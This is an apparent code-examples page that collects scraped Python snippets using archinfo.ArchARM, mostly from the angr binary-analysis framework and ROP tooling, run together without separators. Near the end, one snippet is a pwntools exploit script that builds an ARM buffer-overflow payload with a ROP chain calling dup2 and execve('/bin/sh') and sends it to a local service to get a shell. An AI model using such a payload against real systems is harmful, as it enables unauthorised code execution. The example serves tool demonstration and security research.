How to use the archinfo.ArchARM function in archinfo
To help you get started, we’ve selected a few archinfo examples, based on popular ways it is used in public projects.
Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
angr / angr / angr / simos / linux.py View on Github 
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
if _rtld_global_ro is not None:
pass
libc_obj = self.project.loader.find_object('libc.so.6')
if libc_obj:
self._weak_hook_symbol('_dl_vdso_vsym', L['libc.so.6'].get('_dl_vdso_vsym', self.arch), libc_obj)
tls_obj = self.project.loader.tls_object
if tls_obj is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x28, 0x5f43414e41525900) # _CANARY\x00
self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
elif isinstance(self.project.arch, ArchX86):
self.project.loader.memory.pack_word(tls_obj.thread_pointer + 0x10, self.vsyscall_addr)
elif isinstance(self.project.arch, ArchARM):
self.project.hook(0xffff0fe0, P['linux_kernel']['_kernel_user_helper_get_tls']())
# Only set up ifunc resolution if we are using the ELF backend on AMD64
if isinstance(self.project.loader.main_object, MetaELF):
if isinstance(self.project.arch, (ArchAMD64, ArchX86)):
for binary in self.project.loader.all_objects:
if not isinstance(binary, MetaELF):
continue
for reloc in binary.relocs:
if reloc.symbol is None or reloc.resolvedby is None:
continue
try:
if reloc.resolvedby.subtype != ELFSymbolType.STT_GNU_IFUNC:
continue
except ValueError: # base class Symbol throws this, meaning we don't have an ELFSymbol, etc
continueself._addr = 0x40000
self.arch = arch
# A simple set of tests to ensure we can correctly synthesize some example gadgets
tests = {
archinfo.ArchAMD64 : {
(LoadMem, None, 16, ()) : GadgetList([
MoveReg(archinfo.ArchAMD64(), FakeIrsb(archinfo.ArchAMD64), [40], 16, [], [], 8, 4),
LoadMem(archinfo.ArchAMD64(), FakeIrsb(archinfo.ArchAMD64), [48], 40, [], [], 8, 4)
])
},
archinfo.ArchMIPS64 : {
},
archinfo.ArchPPC64 : {
},
archinfo.ArchARM : {
}
}
#import sys
#arch = archinfo.ArchAMD64
#tests = { arch : tests[arch] }
fail = False
for arch, arch_tests in tests.items():
print "\n{} Tests:".format(arch.name)
for ((desired_type, inputs, output, no_clobber), gadget_list) in arch_tests.items():
synthesizer = GadgetSynthesizer(arch, gadget_list, logging.DEBUG)
result_gadget = synthesizer.create_new_gadgets(desired_type, inputs, output, no_clobber)
if result_gadget == None: # If we didn't get the gadget we want
fail = True
print "\nCouldn't create the gadget {}".format(desired_type.__name__)num_inst = 1
if opt_level is None:
if state and o.OPTIMIZE_IR in state.options:
opt_level = 1
else:
opt_level = self._default_opt_level
if self._support_selfmodifying_code:
if opt_level > 0:
l.warning("Self-modifying code is not always correctly optimized by PyVEX. To guarantee correctness, VEX optimizations have been disabled.")
opt_level = 0
if state and o.OPTIMIZE_IR in state.options:
state.options.remove(o.OPTIMIZE_IR)
# phase 2: thumb normalization
thumb = int(thumb)
if isinstance(arch, ArchARM):
if addr % 2 == 1:
thumb = 1
if thumb:
addr &= ~1
elif thumb:
l.error("thumb=True passed on non-arm architecture!")
thumb = 0
# phase 3: check cache
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level)
if self._use_cache and cache_key in self._block_cache:
self._block_cache_hits += 1
irsb = self._block_cache[cache_key]
stop_point = self._first_stoppoint(irsb)
if stop_point is None:
return irsbdef __init__(self):
super(ArchitectureArmThumb, self).__init__(CS_ARCH_ARM, CS_MODE_THUMB, 4, 2)
self._searcher = SearcherARM()
self._name = 'ARMTHUMB'
self._maxInvalid = 2
if 'archinfo' in globals():
self._info = archinfo.ArchARM()
if 'keystone' in globals():
self._ksarch = (keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB)class SimCCARM(SimCC):
ARG_REGS = [ 'r0', 'r1', 'r2', 'r3' ]
FP_ARG_REGS = [] # TODO: ???
CALLER_SAVED_REGS = [] # TODO: ???
RETURN_ADDR = SimRegArg('lr', 4)
RETURN_VAL = SimRegArg('r0', 4)
ARCH = archinfo.ArchARM
class SimCCARMLinuxSyscall(SimCC):
# TODO: Make sure all the information is correct
ARG_REGS = [ 'r0', 'r1', 'r2', 'r3' ]
FP_ARG_REGS = [] # TODO: ???
RETURN_ADDR = SimRegArg('ip_at_syscall', 4)
RETURN_VAL = SimRegArg('r0', 4)
ARCH = archinfo.ArchARM
@classmethod
def _match(cls, arch, args, sp_delta): # pylint: disable=unused-argument
# never appears anywhere except syscalls
return False
@staticmethod
def syscall_num(state):
return state.regs.r7
class SimCCAArch64(SimCC):
ARG_REGS = [ 'x0', 'x1', 'x2', 'x3', 'x4', 'x5', 'x6', 'x7' ]
FP_ARG_REGS = [] # TODO: ???
RETURN_ADDR = SimRegArg('lr', 8)
RETURN_VAL = SimRegArg('x0', 8)
ARCH = archinfo.ArchAArch64if isinstance(self.proj.arch, ArchAMD64):
self.proj.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF08, self._loader_lock_addr)
self.proj.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF10, self._loader_unlock_addr)
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
if _rtld_global_ro is not None:
pass
tls_obj = self.proj.loader.tls_object
if tls_obj is not None:
if isinstance(self.proj.arch, ArchAMD64):
self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x28, 0x5f43414e4152595f)
self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
elif isinstance(self.proj.arch, ArchX86):
self.proj.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x10, self._vsyscall_addr)
elif isinstance(self.proj.arch, ArchARM):
self.proj.hook(0xffff0fe0, _kernel_user_helper_get_tls, kwargs={'ld': self.proj.loader})
# Only set up ifunc resolution if we are using the ELF backend on AMD64
if isinstance(self.proj.loader.main_bin, MetaELF):
if isinstance(self.proj.arch, ArchAMD64):
for binary in self.proj.loader.all_objects:
if not isinstance(binary, MetaELF):
continue
for reloc in binary.relocs:
if reloc.symbol is None or reloc.resolvedby is None:
continue
if reloc.resolvedby.type != 'STT_GNU_IFUNC':
continue
gotaddr = reloc.addr + binary.rebase_addr
gotvalue = self.proj.loader.memory.read_addr_at(gotaddr)l.warning("Self-modifying code is not always correctly optimized by PyVEX. "
"To guarantee correctness, VEX optimizations have been disabled.")
opt_level = 0
if state and o.OPTIMIZE_IR in state.options:
state.options.remove(o.OPTIMIZE_IR)
if skip_stmts is not True:
skip_stmts = False
use_cache = self._use_cache
if skip_stmts or collect_data_refs:
# Do not cache the blocks if skip_stmts or collect_data_refs are enabled
use_cache = False
# phase 2: thumb normalization
thumb = int(thumb)
if isinstance(arch, ArchARM):
if addr % 2 == 1:
thumb = 1
if thumb:
addr &= ~1
elif thumb:
l.error("thumb=True passed on non-arm architecture!")
thumb = 0
# phase 3: check cache
cache_key = None
if use_cache:
cache_key = (addr, insn_bytes, size, num_inst, thumb, opt_level, strict_block_end)
if cache_key in self._block_cache:
self._block_cache_hits += 1
irsb = self._block_cache[cache_key]
stop_point = self._first_stoppoint(irsb, extra_stop_points)if not terminator_for_nonexistent_node:
return None
# Generate a PathTerminator node
addr = block_id.addr
func_addr = block_id.func_addr
if func_addr is None:
# We'll have to use the current block address instead
# TODO: Is it really OK?
func_addr = addr
input_state = self.project.factory.entry_state()
input_state.ip = addr
pt = VFGNode(addr, block_id, input_state)
self._nodes[block_id] = pt
if isinstance(self.project.arch, archinfo.ArchARM) and addr % 2 == 1:
self._thumb_addrs.add(addr)
self._thumb_addrs.add(addr - 1)
l.debug("Block ID %s does not exist. Create a PathTerminator instead.",
repr(block_id))
return self._nodes[block_id]import archinfo
from pwn import *
from rop_compiler import ropme
filename = './arm_bof_execve'
p = remote('localhost', 2222)
print "Using automatically built ROP chain"
files = [(filename, None, 0)]
goals = [
["function", "dup2", 4, 0],
["function", "dup2", 4, 1],
["function", "dup2", 4, 2],
["execve", "/bin/sh"]
]
rop = ropme.rop(files, [], goals, archinfo.ArchARM(), log_level = logging.DEBUG)
payload = 'A'*512 + 'B'*4 + rop
payload += ((700 - len(payload)) * 'B')
payload += "JEFF" # To end our input
with open("/tmp/rop", "w") as f: f.write(rop)
with open("/tmp/payload", "w") as f: f.write(payload)
p.writeline(payload)
p.interactive()def __init__(self, addr, project=None, arch=None, size=None, byte_string=None, vex=None, thumb=False, backup_state=None,
extra_stop_points=None, opt_level=None, num_inst=None, traceflags=0, strict_block_end=None, collect_data_refs=False):
# set up arch
if project is not None:
self.arch = project.arch
else:
self.arch = arch
if self.arch is None:
raise ValueError('Either "project" or "arch" has to be specified.')
if isinstance(self.arch, ArchARM):
if addr & 1 == 1:
thumb = True
elif thumb:
addr |= 1
else:
thumb = False
self._project = project
self.thumb = thumb
self.addr = addr
self._opt_level = opt_level
if self._project is None and byte_string is None:
raise ValueError('"byte_string" has to be specified if "project" is not provided.')
if size is None:archinfo
Classes with architecture-specific information useful to other projects.
Package Health Score
79 / 100Popular archinfo functions
- archinfo.arch.Arch
- archinfo.arch.Endness
- archinfo.arch.Endness.BE
- archinfo.arch.Endness.LE
- archinfo.arch.Register
- archinfo.arch.register_arch
- archinfo.arch_arm.is_arm_arch
- archinfo.arch_from_id
- archinfo.arch_soot.ArchSoot
- archinfo.arch_soot.SootAddressDescriptor
- archinfo.arch_soot.SootAddressTerminator
- archinfo.arch_soot.SootArgument
- archinfo.arch_soot.SootMethodDescriptor
- archinfo.arch_soot.SootMethodDescriptor.from_soot_method
- archinfo.ArchAMD64
- archinfo.ArchARM
- archinfo.archerror.ArchError
- archinfo.ArchMIPS32
- archinfo.ArchX86
- archinfo.Endness